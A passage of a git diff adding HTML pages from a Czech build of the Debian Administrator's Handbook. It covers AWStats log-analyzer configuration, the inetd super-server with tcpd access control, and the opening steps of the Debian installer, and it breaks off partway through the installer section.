+Allow from 192.168.0.0/16
+Deny from all
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.5.12"></a>11.2.4. Log Analyzers</h3></div></div></div><div
+            class="para">
+				A log analyzer is frequently installed on a web server; since the former provides the administrators with a precise idea of the usage patterns of the latter.
+			</div><div
+            class="para">
+				The Falcot Corp administrators selected <span
+              class="emphasis"><em>AWStats</em></span> (<span
+              class="emphasis"><em>Advanced Web Statistics</em></span>) to analyze their Apache log files.
+			</div><a
+            id="id-1.14.5.12.4"
+            class="indexterm"></a><a
+            id="id-1.14.5.12.5"
+            class="indexterm"></a><a
+            id="id-1.14.5.12.6"
+            class="indexterm"></a><a
+            id="id-1.14.5.12.7"
+            class="indexterm"></a><div
+            class="para">
+				The first configuration step is the customization of the <code
+              class="filename">/etc/awstats/awstats.conf</code> file. The Falcot administrators keep it unchanged apart from the following parameters:
+			</div><pre
+            class="programlisting">
+LogFile="/var/log/apache2/access.log"
+LogFormat = "%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot %uaquot"
+SiteDomain="www.falcot.com"
+HostAliases="falcot.com REGEX[^.*\.falcot\.com$]"
+DNSLookup=1
+LoadPlugin="tooltips"
+</pre><div
+            class="para">
+				All these parameters are documented by comments in the template file. In particular, the <code
+              class="varname">LogFile</code> and <code
+              class="varname">LogFormat</code> parameters describe the location and format of the log file and the information it contains; <code
+              class="varname">SiteDomain</code> and <code
+              class="varname">HostAliases</code> list the various names under which the main web site is known.
+			</div><div
+            class="para">
+				For high traffic sites, <code
+              class="varname">DNSLookup</code> should usually not be set to <code
+              class="literal">1</code>; for smaller sites, such as the Falcot one described above, this setting allows getting more readable reports that include full machine names instead of raw IP addresses.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> Access to statistics</strong></p></div></div></div><div
+              class="para">
+				AWStats makes its statistics available on the website with no restrictions by default, but restrictions can be set up so that only a few (probably internal) IP addresses can access them; the list of allowed IP addresses needs to be defined in the <code
+                class="varname">AllowAccessFromWebToFollowingIPAddresses</code> parameter
+			</div></div><div
+            class="para">
+				AWStats will also be enabled for other virtual hosts; each virtual host needs its own configuration file, such as <code
+              class="filename">/etc/awstats/awstats.www.falcot.org.conf</code>.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.14.5.12.14"></a><p
+              class="title"><strong>Příklad 11.21. AWStats configuration file for a virtual host</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+Include "/etc/awstats/awstats.conf"
+SiteDomain="www.falcot.org"
+HostAliases="falcot.org"
+</pre></div></div><div
+            class="para">
+				AWStats uses many icons stored in the <code
+              class="filename">/usr/share/awstats/icon/</code> directory. In order for these icons to be available on the web site, the Apache configuration needs to be adapted to include the following directive:
+			</div><pre
+            class="programlisting">
+Alias /awstats-icon/ /usr/share/awstats/icon/
+</pre><div
+            class="para">
+				After a few minutes (and once the script has been run a few times), the results are available online: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.falcot.com/cgi-bin/awstats.pl">http://www.falcot.com/cgi-bin/awstats.pl</a></div><div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.falcot.org/cgi-bin/awstats.pl">http://www.falcot.org/cgi-bin/awstats.pl</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Log file rotation</strong></p></div></div></div><div
+              class="para">
+				In order for the statistics to take all the logs into account, <span
+                class="emphasis"><em>AWStats</em></span> needs to be run right before the Apache log files are rotated. Looking at the <code
+                class="literal">prerotate</code> directive of <code
+                class="filename">/etc/logrotate.d/apache2</code> file, this can be solved by putting a symlink to <code
+                class="filename">/usr/share/awstats/tools/update.sh</code> in <code
+                class="filename">/etc/logrotate.d/httpd-prerotate</code>:
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>cat /etc/logrotate.d/apache2
+</code></strong><code
+                class="computeroutput">/var/log/apache2/*.log {
+  daily
+  missingok
+  rotate 14
+  compress
+  delaycompress
+  notifempty
+  create 644 root adm
+  sharedscripts
+  postrotate
+    if /etc/init.d/apache2 status &gt; /dev/null ; then \
+      /etc/init.d/apache2 reload &gt; /dev/null; \
+    fi;
+  endscript
+  prerotate
+    if [ -d /etc/logrotate.d/httpd-prerotate ]; then \
+      run-parts /etc/logrotate.d/httpd-prerotate; \
+    fi; \
+  endscript
+}
+$ </code><strong
+                class="userinput"><code>sudo mkdir -p /etc/logrotate.d/httpd-prerotate
+</code></strong><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>sudo ln -sf /usr/share/awstats/tools/update.sh \
+  /etc/logrotate.d/httpd-prerotate/awstats
+</code></strong></pre><div
+              class="para">
+				Note also that the log files created by <code
+                class="command">logrotate</code> need to be readable by everyone, especially AWStats. In the above example, this is ensured by the <code
+                class="literal">create 644 root adm</code> line (instead of the default <code
+                class="literal">640</code> permissions).
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="network-services.html"><strong>Předcházející</strong>Kapitola 11. Network Services: Postfix, Apache, N...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ftp-file-server.html"><strong>Další</strong>11.3. FTP File Server</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.inetd.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.inetd.html
new file mode 100644
index 000000000..ac99c9b81
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.inetd.html
@@ -0,0 +1,212 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.6. The inetd Super-Server</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.syslog.html"
+        title="9.5. syslog System Events" /><link
+        rel="next"
+        href="sect.task-scheduling-cron-atd.html"
+        title="9.7. Scheduling Tasks with cron and atd" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.inetd.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.syslog.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.task-scheduling-cron-atd.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.inetd"></a>9.6. The <code
+                  class="command">inetd</code> Super-Server</h2></div></div></div><div
+          class="para">
+			Inetd (often called “Internet super-server”) is a server of servers. It executes rarely used servers on demand, so that they do not have to run continuously.
+		</div><a
+          id="id-1.12.9.3"
+          class="indexterm"></a><a
+          id="id-1.12.9.4"
+          class="indexterm"></a><div
+          class="para">
+			The <code
+            class="filename">/etc/inetd.conf</code> file lists these servers and their usual ports. The <code
+            class="command">inetd</code> command listens to all of them; when it detects a connection to any such port, it executes the corresponding server program.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>DEBIAN POLICY</em></span> Register a server in <code
+                      class="filename">inetd.conf</code></strong></p></div></div></div><div
+            class="para">
+			Packages frequently want to register a new server in the <code
+              class="filename">/etc/inetd.conf</code> file, but Debian Policy prohibits any package from modifying a configuration file that it doesn't own. This is why the <code
+              class="command">update-inetd</code> script (in the package with the same name) was created: It manages the configuration file, and other packages can thus use it to register a new server to the super-server's configuration.
+		</div></div><div
+          class="para">
+			Each significant line of the <code
+            class="filename">/etc/inetd.conf</code> file describes a server through seven fields (separated by spaces):
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					The TCP or UDP port number, or the service name (which is mapped to a standard port number with the information contained in the <code
+                  class="filename">/etc/services</code> file).
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The socket type: <code
+                  class="literal">stream</code> for a TCP connection, <code
+                  class="literal">dgram</code> for UDP datagrams.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The protocol: <code
+                  class="literal">tcp</code> or <code
+                  class="literal">udp</code>.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The options: two possible values: <code
+                  class="literal">wait</code> or <code
+                  class="literal">nowait</code>, to tell <code
+                  class="command">inetd</code> whether it should wait or not for the end of the launched process before accepting another connection. For TCP connections, easily multiplexable, you can usually use <code
+                  class="literal">nowait</code>. For programs responding over UDP, you should use <code
+                  class="literal">nowait</code> only if the server is capable of managing several connections in parallel. You can suffix this field with a period, followed by the maximum number of connections authorized per minute (the default limit is 256).
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The user name of the user under whose identity the server will run.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The full path to the server program to execute.
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					The arguments: this is a complete list of the program's arguments, including its own name (<code
+                  class="literal">argv[0]</code> in C).
+				</div></li></ul></div><div
+          class="para">
+			The following example illustrates the most common cases:
+		</div><div
+          class="example"><a
+            xmlns=""
+            id="example.inetd-conf"></a><p
+            class="title"><strong>Příklad 9.1. Excerpt from <code
+                class="filename">/etc/inetd.conf</code></strong></p><div
+            class="example-contents"><pre
+              class="programlisting">talk   dgram  udp wait    nobody.tty /usr/sbin/in.talkd in.talkd
+finger stream tcp nowait  nobody     /usr/sbin/tcpd     in.fingerd
+ident  stream tcp nowait  nobody     /usr/sbin/identd   identd -i
+</pre></div></div><a
+          id="id-1.12.9.11"
+          class="indexterm"></a><div
+          class="para">
+			The <code
+            class="command">tcpd</code> program is frequently used in the <code
+            class="filename">/etc/inetd.conf</code> file. It allows limiting incoming connections by applying access control rules, documented in the <span
+            class="citerefentry"><span
+              class="refentrytitle">hosts_access</span>(5)</span> manual page, and which are configured in the <code
+            class="filename">/etc/hosts.allow</code> and <code
+            class="filename">/etc/hosts.deny</code> files. Once it has been determined that the connection is authorized, <code
+            class="command">tcpd</code> executes the real server (like <code
+            class="command">in.fingerd</code> in our example). It is worth noting that <code
+            class="command">tcpd</code> relies on the name under which it was invoked (that is the first argument, <code
+            class="literal">argv[0]</code>) to identify the real program to run. So you should not start the arguments list with <code
+            class="literal">tcpd</code> but with the program that must be wrapped.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>COMMUNITY</em></span> Wietse Venema</strong></p></div></div></div><a
+            id="id-1.12.9.13.2"
+            class="indexterm"></a><a
+            id="id-1.12.9.13.3"
+            class="indexterm"></a><div
+            class="para">
+			Wietse Venema, whose expertise in security has made him a renowned programmer, is the author of the <code
+              class="command">tcpd</code> program. He is also the main creator of Postfix, the modular e-mail server (SMTP, Simple Mail Transfer Protocol), designed to be safer and more reliable than <code
+              class="command">sendmail</code>, which features a long history of security vulnerabilities.
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Other <code
+                      class="command">inetd</code> commands</strong></p></div></div></div><div
+            class="para">
+			While Debian installs <span
+              class="pkg pkg">openbsd-inetd</span> by default, there is no lack of alternatives: we can mention <span
+              class="pkg pkg">inetutils-inetd</span>, <span
+              class="pkg pkg">micro-inetd</span>, <span
+              class="pkg pkg">rlinetd</span> and <span
+              class="pkg pkg">xinetd</span>.
+		</div><div
+            class="para">
+			This last incarnation of a super-server offers very interesting possibilities. Most notably, its configuration can be split into several files (stored, of course, in the <code
+              class="filename">/etc/xinetd.d/</code> directory), which can make an administrator's life easier.
+		</div><div
+            class="para">
+			Last but not least, it is even possible to emulate <code
+              class="command">inetd</code>'s behaviour with <code
+              class="command">systemd</code>'s socket-activation mechanism (see <a
+              class="xref"
+              href="unix-services.html#sect.systemd">9.1.1 – „The systemd init system“</a>).
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.syslog.html"><strong>Předcházející</strong>9.5. syslog System Events</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.task-scheduling-cron-atd.html"><strong>Další</strong>9.7. Scheduling Tasks with cron and atd</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.installation-steps.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.installation-steps.html
new file mode 100644
index 000000000..fa8b3c659
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.installation-steps.html
@@ -0,0 +1,897 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">4.2. Installing, Step by Step</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Installation, Partitioning, Formatting, File System, Boot Sector, Hardware Detection" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="installation.html"
+        title="Kapitola 4. Installation" /><link
+        rel="prev"
+        href="installation.html"
+        title="Kapitola 4. Installation" /><link
+        rel="next"
+        href="sect.after-first-boot.html"
+        title="4.3. After the First Boot" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.installation-steps.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="installation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.after-first-boot.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.installation-steps"></a>4.2. Installing, Step by Step</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-boot"></a>4.2.1. Booting and Starting the Installer</h3></div></div></div><div
+            class="para">
+				Once the BIOS has begun booting from the CD- or DVD-ROM, the Isolinux bootloader menu appears. At this stage, the Linux kernel is not yet loaded; this menu allows you to choose the kernel to boot and enter possible parameters to be transferred to it in the process.
+			</div><div
+            class="para">
+				For a standard installation, you only need to choose “Install” or “Graphical install” (with the arrow keys), then press the <span
+              class="keycap"><strong>Enter</strong></span> key to initiate the remainder of the installation process. If the DVD-ROM is a “Multi-arch” disk, and the machine has an Intel or AMD 64 bit processor, those menu options enable the installation of the 64 bit variant (<span
+              class="emphasis"><em>amd64</em></span>) and the installation of the 32 bit variant remains available in a dedicated sub-menu (“32-bit install options”). If you have a 32 bit processor, you don't get a choice and the menu entries install the 32 bit variant (<span
+              class="emphasis"><em>i386</em></span>).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> 32 or 64 bits?</strong></p></div></div></div><a
+              id="id-1.7.12.2.4.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.2.4.3"
+              class="indexterm"></a><a
+              id="id-1.7.12.2.4.4"
+              class="indexterm"></a><div
+              class="para">
+				The fundamental difference between 32 and 64 bit systems is the size of memory addresses. In theory, a 32 bit system can not work with more than 4 GB of RAM (2<sup>32</sup> bytes). In practice, it is possible to work around this limitation by using the <code
+                class="literal">686-pae</code> kernel variant, so long as the processor handles the PAE (Physical Address Extension) functionality. Using it does have a notable influence on system performance, however. This is why it is useful to use the 64 bit mode on a server with a large amount of RAM.
+			</div><div
+              class="para">
+				For an office computer (where a few percent difference in performance is negligible), you must keep in mind that some proprietary programs are not available in 64 bit versions (such as Skype, for example). It is technically possible to make them work on 64 bit systems, but you have to install the 32 bit versions of all the necessary libraries (see <a
+                class="xref"
+                href="sect.manipulating-packages-with-dpkg.html#sect.multi-arch">5.4.5 – „Multi-Arch Support“</a>), and sometimes to use <code
+                class="command">setarch</code> or <code
+                class="command">linux32</code> (in the <span
+                class="pkg pkg">util-linux</span> package) to trick applications regarding the nature of the system. <a
+                id="id-1.7.12.2.4.6.5"
+                class="indexterm"></a> <a
+                id="id-1.7.12.2.4.6.6"
+                class="indexterm"></a>
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Installation alongside an existing Windows system</strong></p></div></div></div><a
+              id="id-1.7.12.2.5.2"
+              class="indexterm"></a><div
+              class="para">
+				If the computer is already running Windows, it is not necessary to delete the system in order to install Debian. You can have both systems at once, each installed on a separate disk or partition, and choose which to start when booting the computer. This configuration is often called “dual boot”, and the Debian installation system can set it up. This is done during the hard drive partitioning stage of installation and while setting up the bootloader (see the sidebars <a
+                class="xref"
+                href="sect.installation-steps.html#sidebar.shrinking-partition"><span
+                  class="emphasis"><em>IN PRACTICE</em></span> Shrinking a Windows partition</a> and <a
+                class="xref"
+                href="sect.installation-steps.html#sidebar.bootloader-dual-boot"><span
+                  class="emphasis"><em>BEWARE</em></span> Bootloader and dual boot</a>).
+			</div><div
+              class="para">
+				If you already have a working Windows system, you can even avoid using a CD-ROM; Debian offers a Windows program that will download a light Debian installer and set it up on the hard disk. You then only need to reboot the computer and choose between normal Windows boot or booting the installation program. You can also find it on a dedicated website with a rather explicit name… <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://ftp.debian.org/debian/tools/win32-loader/stable/">http://ftp.debian.org/debian/tools/win32-loader/stable/</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.goodbye-microsoft.com/">http://www.goodbye-microsoft.com/</a></div>
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Bootloader</strong></p></div></div></div><a
+              id="id-1.7.12.2.6.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.2.6.3"
+              class="indexterm"></a><a
+              id="id-1.7.12.2.6.4"
+              class="indexterm"></a><div
+              class="para">
+				The bootloader is a low-level program that is responsible for booting the Linux kernel just after the BIOS passes off its control. To handle this task, it must be able to locate the Linux kernel to boot on the disk. On the i386 and amd64 architectures, the two most used programs to perform this task are LILO, the older of the two, and GRUB, its modern replacement. Isolinux and Syslinux are alternatives frequently used to boot from removable media.
+			</div></div><div
+            class="para">
+				Each menu entry hides a specific boot command line, which can be configured as needed by pressing the <span
+              class="keycap"><strong>TAB</strong></span> key before validating the entry and booting. The “Help” menu entry displays the old command line interface, where the <span
+              class="keycap"><strong>F1</strong></span> to <span
+              class="keycap"><strong>F10</strong></span> keys display different help screens detailing the various options available at the prompt. You will rarely need to use this option except in very specific cases.
+			</div><div
+            class="para">
+				The “expert” mode (accessible in the “Advanced options” menu) details all possible options in the process of installation, and allows navigation between the various steps without them happening automatically in sequence. Be careful, this very verbose mode can be confusing due to the multitude of configuration choices that it offers.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.2.9"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-boot.png"
+                  alt="Boot screen" /></div></div><p
+              class="title"><strong>Obrázek 4.1. Boot screen</strong></p></div><div
+            class="para">
+				Once booted, the installation program guides you step by step throughout the process. This section presents each of these steps in detail. Here we follow the process of an installation from an amd64 DVD-ROM (more specifically, the rc3 version of the installer for Stretch); <span
+              class="emphasis"><em>netinst</em></span> installations, as well as the final release of the installer, may look slightly different. We will also address installation in graphical mode, but the only difference from “classic” (text-mode) installation is in the visual appearance.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-lang"></a>4.2.2. Selecting the language</h3></div></div></div><a
+            id="id-1.7.12.3.2"
+            class="indexterm"></a><div
+            class="para">
+				The installation program begins in English, but the first step allows the user to choose the language that will be used in the rest of the process. Choosing French, for example, will provide an installation entirely translated into French (and a system configured in French as a result). This choice is also used to define more relevant default choices in subsequent stages (notably the keyboard layout).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Navigating with the keyboard</strong></p></div></div></div><div
+              class="para">
+				Some steps in the installation process require you to enter information. These screens have several areas that may “have focus” (text entry area, checkboxes, list of choices, OK and Cancel buttons), and the <span
+                class="keycap"><strong>TAB</strong></span> key allows you to move from one to another.
+			</div><div
+              class="para">
+				In graphical mode, you can use the mouse as you would normally on an installed graphical desktop.
+			</div></div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.3.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-lang.png"
+                  alt="Selecting the language" /></div><div
+                class="mediaobject"><img
+                  src="images/inst-lang-txt.png"
+                  alt="Selecting the language" /></div></div><p
+              class="title"><strong>Obrázek 4.2. Selecting the language</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-country"></a>4.2.3. Selecting the country</h3></div></div></div><a
+            id="id-1.7.12.4.2"
+            class="indexterm"></a><div
+            class="para">
+				The second step consists in choosing your country. Combined with the language, this information enables the program to offer the most appropriate keyboard layout. This will also influence the configuration of the time zone. In the United States, a standard QWERTY keyboard is suggested, and a choice of appropriate time zones is offered.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.4.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-country.png"
+                  alt="Selecting the country" /></div><div
+                class="mediaobject"><img
+                  src="images/inst-country-txt.png"
+                  alt="Selecting the country" /></div></div><p
+              class="title"><strong>Obrázek 4.3. Selecting the country</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-keyboard"></a>4.2.4. Selecting the keyboard layout</h3></div></div></div><a
+            id="id-1.7.12.5.2"
+            class="indexterm"></a><a
+            id="id-1.7.12.5.3"
+            class="indexterm"></a><div
+            class="para">
+				The proposed “American English” keyboard corresponds to the usual QWERTY layout.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.5.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-keyboard.png"
+                  alt="Choice of keyboard" /></div><div
+                class="mediaobject"><img
+                  src="images/inst-keyboard-txt.png"
+                  alt="Choice of keyboard" /></div></div><p
+              class="title"><strong>Obrázek 4.4. Choice of keyboard</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-detect-hardware"></a>4.2.5. Detecting Hardware</h3></div></div></div><div
+            class="para">
+				This step is completely automatic in the vast majority of cases. The installer detects your hardware, and tries to identify the CD-ROM drive used in order to access its content. It loads the modules corresponding to the various hardware components detected, and then “mounts” the CD-ROM in order to read it. The previous steps were completely contained in the boot image included on the CD, a file of limited size and loaded into memory by the BIOS when booting from the CD.
+			</div><div
+            class="para">
+				The installer can work with the vast majority of drives, especially standard ATAPI peripherals (sometimes called IDE and EIDE). However, if detection of the CD-ROM reader fails, the installer offers the choice to load a kernel module (for instance from a USB key) corresponding to the CD-ROM driver.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-load-components"></a>4.2.6. Loading Components</h3></div></div></div><div
+            class="para">
+				With the contents of the CD now available, the installer loads all the files necessary to continue with its work. This includes additional drivers for the remaining hardware (especially the network card), as well as all the components of the installation program.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-detect-network"></a>4.2.7. Detecting Network Hardware</h3></div></div></div><div
+            class="para">
+				This automatic step tries to identify the network card and load the corresponding module. If automatic detection fails, you can manually select the module to load. If no module works, it is possible to load a specific module from a removable device. This last solution is usually only needed if the appropriate driver is not included in the standard Linux kernel, but available elsewhere, such as the manufacturer's website.
+			</div><div
+            class="para">
+				This step must absolutely be successful for <span
+              class="emphasis"><em>netinst</em></span> installations, since the Debian packages must be loaded from the network.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.install-network-config"></a>4.2.8. Configuring the Network</h3></div></div></div><a
+            id="id-1.7.12.9.2"
+            class="indexterm"></a><a
+            id="id-1.7.12.9.3"
+            class="indexterm"></a><div
+            class="para">
+				In order to automate the process as much as possible, the installer attempts an automatic network configuration by DHCP (for IPv4) and by IPv6 network discovery. If this fails, it offers more choices: try again with a normal DHCP configuration, attempt DHCP configuration by declaring the name of the machine, or set up a static network configuration.
+			</div><div
+            class="para">
+				This last option requires an IP address, a subnet mask, an IP address for a potential gateway, a machine name, and a domain name.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Configuration without DHCP</strong></p></div></div></div><div
+              class="para">
+				If the local network is equipped with a DHCP server that you do not wish to use because you prefer to define a static IP address for the machine during installation, you can add the <strong
+                class="userinput"><code>netcfg/use_dhcp=false</code></strong> option when booting from the CD-ROM. You just need to go to the desired menu entry by pressing the <span
+                class="keycap"><strong>TAB</strong></span> key and add the desired option before pressing the <span
+                class="keycap"><strong>Enter</strong></span> key.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BEWARE</em></span> Do not improvise</strong></p></div></div></div><div
+              class="para">
+				Many local area networks are based on an implicit assumption that all machines can be trusted, and inadequate configuration of a single computer will often perturb the whole network. As a result, do not connect your machine to a network without first agreeing with its administrator on the appropriate settings (for example, the IP address, netmask, and broadcast address).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.10"></a>4.2.9. Administrator Password</h3></div></div></div><a
+            id="id-1.7.12.10.2"
+            class="indexterm"></a><div
+            class="para">
+				The super-user root account, reserved for the machine's administrator, is automatically created during installation; this is why a password is requested. The installer also asks for a confirmation of the password to prevent any input error which would later be difficult to amend.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.10.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-rootpw.png"
+                  alt="Administrator Password" /></div></div><p
+              class="title"><strong>Obrázek 4.5. Administrator Password</strong></p></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
